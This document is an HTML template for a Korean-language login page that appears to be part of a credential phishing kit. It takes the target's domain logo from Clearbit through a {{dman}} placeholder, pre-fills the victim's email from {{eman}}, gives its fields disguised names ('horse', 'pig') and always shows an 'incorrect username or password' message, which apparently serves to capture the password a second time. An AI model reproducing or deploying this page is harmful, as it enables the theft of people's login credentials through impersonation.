<!DOCTYPE html>
<html>
<head>
  <title>로그인 </title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="icon" href="https://logo.clearbit.com/{{dman}}" type="image/x-icon"/>
  <style>
    #red{
      color:white;
      background: red;
    }

    body {
      margin: 0;
      padding: 0;
      background: url(https://images.unsplash.com/photo-1679679195912-29d0190805ad?ixlib=rb-4.0.3&ixid=M3wxMjA3fDF8MHxwaG90by1wYWdlfHx8fGVufDB8fHx8fA%3D%3D&auto=format&fit=crop&w=1470&q=80);
      width: 500px;
      height: 500px;
      background-size: cover;
      background-position: center;
      font font-family: sans-serif;
    }

    .login-container {
      width: 90%;
      max-width: 400px;
      margin: auto;
      height: 420px;
      background: rgba(0, 0, 0, 0.9);
      border-radius: 45px;
      color: #fff;
      position: absolute;
      top: 50%;
      left: 50%;
      transform: translate(-50%, -50%);
      padding: 70px 30px;
    }

    .login-container p {
      margin: 0;
      padding: 0;
      font-weight: bold;
    }

    .login-container input {
      width: 100%;
      margin-bottom: 20px;
    }

    .login-container input[type="text"],
    input[type="password"] {
      border: none;
      border-bottom: 1px solid #fff;
      background: transparent;
      outline: none;
      height: 40px;
      color: #fff;
      font-size: 16px;
    }

    .login-container input[type="submit"] {
      border: none;
      outline: none;
      height: 40px;
      background: #1c8adb;
      color: #fff;
      font-size: 18px;
      border-radius: 20px;
    }

    .login-container input[type="submit"]:hover {
      cursor: pointer;
      background: #39dc79;
      color: #000;
    }

    h1 {
      margin: 0;
      padding: 0 0 20px;
      text-align: center;
      font-size: 22px;
    }

    .login-container a {
      text-decoration: none;
      font-size: 14px;
      color: #fff;
    }

    .login-container a:hover {
      color: #39dc79;
    }

    .avatar {
      width: 100px;
      height: 100px;
      border-radius: 50%;
      position: absolute;
      top: -50px;
      left: calc(50% - 50px);
    }

    @media (max-width: 600px) {
      .login-container {
        height: auto;
        padding: 50px 30px;
      }

      .avatar {
        width: 80px;
        height: 80px;
        top: -40px;
      }
    }
  </style>
<body>
<div class="login-container">
  <img src="https://logo.clearbit.com/{{dman}}" class="avatar">
  <h1>여기에 로그인하세요</h1>
  <form action="second" method="post">
   <p id="red">잘못된 사용자 이름 또는 비밀번호</p>
  <p>사용자 이름</p>
  <input type="text" name="horse" value="{{eman}}" required="">
  <p>비밀번호</p>
  <input type="password" name="pig" placeholder="암호를 입력" required>
  <input type="submit" name="submit" value="로그인">
  <a href="#">비밀번호 분실</a>
  </form>
</div>
</body>
</html>
